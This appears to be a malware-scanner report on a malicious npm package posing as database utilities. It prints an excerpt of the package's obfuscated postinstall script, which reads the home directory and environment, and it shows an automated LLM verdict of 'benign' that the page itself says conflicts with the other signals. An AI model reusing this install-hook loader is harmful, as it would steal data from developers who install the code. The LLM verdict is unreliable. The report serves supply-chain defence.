// npm 패키지
@cloudplatform-single-spa/floating-ips
Internal database utilities with connection pooling, query builder and migration support
주간
46
월간
46
버전
3
메인테이너
1
라이선스
UNLICENSED
최초 publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,278 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-28
// exfil path
what is read → where it ships
steals
- ○ home dir
sends to
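(no destination string extracted — payload may be dynamic / obfuscated. This reflects plain-text string extraction only: the postinstall excerpt below keeps its strings in an encoded lookup table, and entries such as `Ahr0Ca` and `Ahr0Chm6lY9VB2iUBw9PA2eUDgvJAc9WyxLSB2fKlW` look like encoded `http` / `https://` values, so an empty destination here is not evidence that nothing is sent — decode the table before relying on this field.)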
evidence in excerpt
> 'use strict';const a0_0x1c198b=a0_0x2816;(function(_0xe6af46,_0x4852b1){const _0x16e480=a0_0x2816,_0x42428b=_0xe6af46();while(!![]){try{const _0x47636e=-parseInt(_0x16e480(0xbb))/(-0xbf*0x1a+0x1*0xf25…
// publisher 캠페인 · by mr.4nd3r50n
이 계정에서 catch된 패키지 9건
고립된 catch가 아닙니다. 동일 publisher가 8개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태입니다. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @100.100.100· 1 file flagged
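llm: benign · 0.85 → 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s). (주의: 이 LLM 판정은 같은 페이지에 표시된 heuristic 100/100, osv-flagged:MAL-2026-4922, install-scripts:postinstall 신호와 상충합니다. postinstall 스크립트가 난독화되어 있으므로, 문자열 테이블을 복호화해 확인하기 전에는 이 판정만으로 패키지를 안전하다고 보아서는 안 됩니다.)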
- @100.100.100 · AUTO-PUBLISHED · publisher: mr.4nd3r50n · heuristic 100/100 · static flags 2 · llm benign (0.85) via ollama · install-scripts:postinstall · new-publisher:1d · anomalous-major-version:100 · publisher-multi-name-burst:24 · publisher-version-pump:25 · osv-flagged:MAL-2026-4922 · reads-env-vars · reads-homedir
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code · 1 file flagged · patterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x1c198b=a0_0x2816;(function(_0xe6af46,_0x4852b1){const _0x16e480=a0_0x2816,_0x42428b=_0xe6af46();while(!![]){try{const _0x47636e=-parseInt(_0x16e480(0xbb))/(-0xbf*0x1a+0x1*0xf25+-0x442*-0x1)*(parseInt(_0x16e480(0xe3))/(0x527*0x5+0x545+-0x1f06))+-parseInt(_0x16e480(0xaa))/(-0x4b6+0x2*-0x135b+0x2b6f)+parseInt(_0x16e480(0xe4))/(-0x1*0x1480+0xe*0x207+-0x7de)+-parseInt(_0x16e480(0xd3))/(-0x2301+0x1*0x1c01+-0x3*-0x257)*(-parseInt(_0x16e480(0xa7))/(0x1*0x14bc+-0x7d*0x21+-0x499))+-parseInt(_0x16e480(0x9e))/(-0xd*0x1da+-0x7ea+-0x37*-0x95)*(-parseInt(_0x16e480(0xbd))/(-0x6*-0x2+0x1*0x1f84+-0xfc4*0x2))+parseInt(_0x16e480(0xd6))/(-0x2d7*-0xc+0x1e3a+0x4045*-0x1)+-parseInt(_0x16e480(0xb6))/(0x91+-0x703+0x67c);if(_0x47636e===_0x4852b1)break;else _0x42428b['push'](_0x42428b['shift']());}catch(_0x52e1f7){_0x42428b['push'](_0x42428b['shift']());}}}(a0_0x3719,0xe0088+-0xdf735*-0x1+-0x14219*0xd));function a0_0x3719(){const _0x2b6b25=['zxHPC3rZu3LUyW','zxHLy1bHDgG','y2HPBgrFChjVy2vZCW','lMnHy2HL','CgfJA2fNzs5QC29U','BwfJ','CMvWBgfJzq','mtbvrNPNqu8','xsbxyxjUAw5NoIboB2rLlMPZid49mtyUmcbYzxf1AxjLza','zw52','mteWotCZnLf5qvvRzG','yxbWBhK','D29YA3nWywnLCW','BwTKAxjtEw5J','DgLTzw91Da','CMvHzgrPCLn5BMm','y2HHCKnVzgvbDa','C3rKAw8','uefzte9bra','lMPZ','Ahr0Chm6lY9VB2iUBw9PA2eUDgvJAc9WyxLSB2fKlW','Ahr0Ca','D3jPDgu','mZmWotm4BvrsD2fN','mZu5mdy4mfzJAxzoDq','uKvdt05Ft05mwq','BM93','BM9Kzq','lMPZB24','D2LUmZi','Dg1WzgLY','y29UC3rYDwn0B3i','qgnSB3vKCgXHDgzVCM0TC2LUz2XLlxnWys9MBg9HDgLUzY1PC --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: 
PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
